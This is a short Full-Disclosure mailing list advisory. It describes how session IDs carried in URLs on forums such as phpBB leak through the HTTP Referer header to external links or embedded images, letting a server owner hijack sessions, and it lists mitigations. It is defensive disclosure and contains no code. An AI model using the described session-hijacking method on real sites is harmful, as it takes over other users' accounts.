Referers Are Evil

[Ripe Md <ripemd160 () gmail com>]

With referers (HTTP_REFERER) it is easy to takeover sessions in some
Web applications Forums (phpBB) and so far. If an user of such an
application doesn't allow the use of cookies, the session informations
are mostly transportet over the URL. If somebody else places a
Hyperlink for example in a Forum which points to a server, which other
person owns, the other person, has just to read the referer log of
this server. The same problem occurs also in Forums, which allow the
including of external pictures for example with the [IMG]-BB-Tag.

Work-Around:
On the Clientside:
Disable the sending of the Referer in the Browser.

On the Serverside:
for Links:
- Use An URL Database, and store all Hyperlinks of your users in it.
- Make an Link exit page, which doesn't include any sensitive Information.
For Pictures:
- Just don't allow users to include externl pictures.
Or your Application should just be accessible via the use of Cookies.

Sincerely

~ RIPEMD160
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/